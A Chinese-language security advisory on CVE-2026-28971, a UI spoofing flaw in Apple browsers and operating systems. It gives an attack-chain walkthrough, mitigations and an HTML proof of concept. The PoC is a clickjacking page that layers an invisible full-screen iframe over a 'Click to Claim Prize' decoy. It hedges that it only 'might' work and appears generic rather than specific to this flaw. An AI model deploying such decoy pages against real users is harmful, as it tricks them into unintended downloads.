CVE-2026-28971 Apple多款产品UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-28971

漏洞类型

UI欺骗

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Safari, iOS, iPadOS, macOS, visionOS

漏洞概述

CVE-2026-28971是Apple多个生态系统产品（包括Safari、iOS、iPadOS、macOS及visionOS）中存在的一个中危安全漏洞。该漏洞源于浏览器UI处理机制的逻辑缺陷，允许恶意iframe利用并操纵另一个网站的下载设置。攻击者通过构造包含恶意iframe的网页，诱导用户进行特定交互，从而绕过浏览器的安全限制，导致非预期的文件下载或敏感信息泄露。Apple已在Safari 26.5及相关系统26.5版本中修复了此问题。

技术细节

该漏洞的技术核心在于Web浏览器处理跨域iframe及下载请求时的UI状态混淆。在受影响的Apple产品版本中，浏览器未能正确隔离不同上下文中的下载配置，导致恶意网页可以通过嵌入的iframe访问或利用目标网站的下载属性。具体而言，攻击者构建一个恶意站点，并在其中嵌入指向合法目标网站的iframe。由于UI处理的缺陷，当用户在恶意页面上进行看似无害的操作（如点击按钮）时，浏览器可能错误地将该操作关联到iframe内部的下载逻辑中。这使得攻击者能够利用目标网站的信任设置（如自动下载允许列表或文件处理偏好），在用户不知情的情况下触发恶意文件的下载。该问题本质上属于一种UI欺骗攻击，绕过了同源策略对DOM访问的严格限制，利用了渲染层与逻辑层之间的状态不一致性。

攻击链分析

STEP 1

步骤1：攻击准备

攻击者构建一个恶意网页，其中包含一个指向目标网站的iframe，并设置CSS样式使其隐蔽或覆盖在诱饵内容之上。

STEP 2

步骤2：诱导访问

攻击者通过钓鱼邮件或社交媒体诱导受害者访问包含恶意代码的网页链接。

STEP 3

步骤3：用户交互

受害者在网页上点击看似正常的按钮或链接，实际上点击的是隐藏的iframe区域。

STEP 4

步骤4：利用漏洞

由于浏览器的UI处理缺陷，该交互被错误地关联到iframe上下文中，利用了目标网站的下载设置。

STEP 5

步骤5：执行攻击

浏览器在用户不知情的情况下，利用目标网站的权限或设置触发恶意文件下载或泄露配置信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-28971
This PoC demonstrates how a malicious iframe might attempt to leverage
download settings of a target site due to improper UI handling.
-->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-28971 PoC</title>
    <style>
        /* Overlay style to trick user interaction */
        body {
            margin: 0;
            overflow: hidden;
        }
        #target-frame {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            opacity: 0.0; /* Hidden iframe */
            z-index: 1;
        }
        #decoy-layer {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 0;
            padding: 20px;
            background: #f0f0f0;
            border: 1px solid #ccc;
            text-align: center;
        }
    </style>
</head>
<body>
    <!-- Decoy content to lure user click -->
    <div id="decoy-layer">
        <h2>Click to Claim Prize</h2>
        <button>Claim Now</button>
    </div>

    <!-- Malicious iframe loading a site that handles downloads -->
    <iframe id="target-frame" src="https://example.com/download-settings"></iframe>

    <script>
        // Logic to handle the interaction
        document.querySelector('button').addEventListener('click', () => {
            console.log('User clicked. Attempting to trigger download via iframe context.');
            // In a vulnerable version, this click might pass through to the iframe
            // or leverage the target site's download settings automatically.
            alert('PoC Triggered: Check if unintended download started.');
        });
    </script>
</body>
</html>

影响范围

Safari < 26.5

iOS < 26.5

iPadOS < 26.5

macOS Tahoe < 26.5

visionOS < 26.5

防御指南

临时缓解措施

对于无法立即升级系统的用户，建议在浏览器设置中禁用JavaScript或严格限制第三方Cookie和跨域追踪。同时，应警惕不明来源的网页诱导点击操作，仅在可信的上下文中进行文件下载。企业网络管理员可部署Web代理过滤器，检测并拦截包含可疑iframe结构的恶意页面流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-28971
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-28971
3 Details https://www.cvedetails.com/cve/CVE-2026-28971/
4 VulDB https://vuldb.com/cve/CVE-2026-28971
5 Link https://support.apple.com/en-us/127110
6 Link https://support.apple.com/en-us/127115
7 Link https://support.apple.com/en-us/127120
8 Link https://support.apple.com/en-us/127121